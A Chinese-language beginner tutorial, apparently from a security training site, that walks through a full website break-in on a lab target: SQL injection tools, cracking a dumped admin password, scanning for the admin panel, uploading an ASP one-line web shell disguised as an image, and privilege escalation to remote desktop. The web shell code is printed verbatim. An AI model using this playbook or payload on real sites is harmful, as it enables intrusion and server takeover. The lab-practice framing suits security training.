小白客带你走进黑客世界13之我是一个脚本小子

关注 2017-03-29 17:30:27 查看数 23054 ,评论数 0 专题 渗透测试

首先,大家先跟着我一起背诵三字经。

xbk1 (1) 这是一篇在脚本小子的世界里流传的比较广的渗透三字经,也是拿下一个网站的基本思路。 何为脚本小子?一般来说,我们通常会把以“黑客”自居并沾沾自喜的初学者叫做脚本小子。脚本小子不像真正的黑客那样发现系统漏洞,他们通常使用别人开发的程序来恶意破坏他人系统。 通常的刻板印象为一位没有专科经验的少年,破坏无辜网站企图使得他的朋友感到惊讶。他们常常从某些网站上复制脚本代码,然后到处粘贴,却并不一定明白他们的方法与原理。他们钦慕于黑客的能力与探索精神,但与黑客所不同的是,脚本小子通常只是对计算机系统有基础了解与爱好,但并不注重程序语言、算法、和数据结构的研究,虽然这些对于真正的黑客来说是必须具备的素质。 今天,小白带你入门脚本小子。文章开头一起朗读的三字经文不知道大家还有没有印象。一般来说,最简单的渗透流程就来自这三字经:找注入-爆账号-找后台-传小马-拿权限。其中,这个流程的每一个阶段都有代表性的利用工具,先提前和大家介绍一下。 0x01 找注入 && 0x02 爆账号
工具:啊D注入工具、椰树、Pangolin(穿山甲)、havij(胡萝卜)
0x03 找后台
工具:御剑后台扫描、wwwscan扫描器
0x04 传小马
工具:pr提权工具、巴西烤肉提权工具

先不讲工具的原理这些废话,下面开始直接带你渗透一个网站。

由于小白手上没有对应的实验环境,转战i春秋,直接利用i春秋网站上提供的环境为大家来演示。
http://www.ichunqiu.com/racing

演示开始

Setup 1 找注入

打开桌面上的火狐浏览器,出现如下图的页面 什么都不要想,直接上啊D注入工具 成功找到注入点,如下图所示。

Setup2 爆账号

右键找到的注入点-注入检测 点击右上角的检测开始注入检测 最后得到网站的某个账号,用户名是linhai,密码为d7e15730ef9708c0。一般来说,数据库存放的密码应该是经过md5加密过的,怎么破?别慌!
解密MD5网站: http://www.dmd5.com/
解密md5后得到密码值为linhai19760812

Setup3 找后台

此步骤为找到网站的管理后台。来人啊,上工具。 打开后开始扫描 接下来,访问扫描到的后台地址,登陆。
地址:http://www.test.ichunqiu/admin/login.asp
直接登陆到网站的后台,到这里,是不是内心还伴随着一点小小的心动呢?

Setup4 传小马

由于是asp的站点,确定需要的是asp一句话木马,代码为
<%eval request("x")%>,密码为x
小白试了很多的上传点,比如这里: 还有这里 这里 这里 但是!!!功夫不负有心人,还是让我找到了一个上传点。 于是乎新建一个txt文档,写上asp一句话<%eval request("x")%>,密码是x。并且把文件类型改成图片。也不要只写一行代码,不大不小,100行差不多。 然后上传 接下来的思路就是利用网站的数据库功能把我们上传的文件后缀由jpg改成asp 然后,拿出我们的菜刀,连接刚我们复制到根目录的xbk.asp文件(木马)
地址是:http://www.test.ichunqiu/xbk.asp,密码是x。
在空白处 右键-添加 ,输入木马的地址和网站

Setup5 拿权限

右键木马的地址,选择 虚拟终端 输入任意命令,发现没有权限,访问被拒绝 接下切换到回收站目录下,回收站是几个有限拥有执行权限的目录。 分别找到我们的提权三件套:cmd.exe、pr.exe、3389.bat 接着,将三件套上传到回收站目录下面,如下图所示。 接下来,进入我们上传的cmd.exe的虚拟终端,执行我们的提权三件套。 执行完成之后,打远程连接,进入服务器。

至此,一个完整的渗透过程到此结束。

xbk1 (65)  

*作者:_小白客,未经允许禁止转载

交流评论(0)
Loading...
点击 ,就能发表评论哦~如果您还没有账号,请 一个吧
css.php
正在加载中...